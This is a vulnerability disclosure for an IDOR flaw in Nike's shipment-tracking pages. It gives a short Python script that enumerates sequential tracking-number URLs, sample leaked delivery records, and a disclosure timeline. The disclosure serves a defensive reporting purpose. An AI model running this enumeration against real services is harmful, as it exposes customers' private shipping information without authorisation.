Exploit Title: Nike.com - Insecure Direct Object Reference (IDOR).
Exploit Author: Nir Yehoshua.
Exploit Date: 2020-5-27.
Link to vulnerable website: https://www.nike.com
Category: Web Application.
Details: An IDOR vulnerability discovered at Nike.com website that can lead to sensitive information disclosure.
Proof of Concept (Python):

=============================
#Nike.com IDOR by Nir Yehoshua
import requests

URL = 'https://secure-global-tracking.nike.com/nike/tracking/%d'

def IDOR():
    for number in range(6001050010000, 6001056053999):
        Request(number)

def Request(nunber):
    BaseRequest = URL % nunber
    print BaseRequest

IDOR()





Example Data:

Date	Time	Description	Location
2020-02-27	13:45	Delivered	MORELIA-MEX
2020-02-27	13:13	Out for Delivery	MORELIA-MEX
2020-02-26	11:06	Arrived at Transit Hub	GUADALAJARA-MEX
2020-02-26	02:00	Customs Released	CINCINNATI HUB,OH-USA
2020-02-25	21:35	In Transit to Destination Country	BRUSSELS-BEL
2020-02-25	15:31	Departed Origin Country	AMSTERDAM-NLD
2020-02-24	18:22	Pending customs release (Please allow 1-2 days)	
2020-02-24	11:01	Arrived Destination Region/Country	AMS
2020-02-24	10:58	General Update	
2020-02-23	16:14	Departed International Hub	
2020-02-23	15:59	Arrived International Hub	
2020-02-23	11:01	Departed Origin Country	AMS
2020-02-23	08:12	Packages Details Received – Awaiting Dispatch	NL
* Date/Time values are local times where the activity is located

Disclosure Timeline:
February 26th – Vulnerability reported to Nike.
February 28th – Initial response and vulnerability confirmation from Nike.
March 4th – Status update from Nike.
April 7th – An update email sent to Nike about the intention to disclose the vulnerability. No response from Nike. 
May 27th – The vulnerability disclosed after 90 days of deadline that has given to Nike to patch the vulnerability.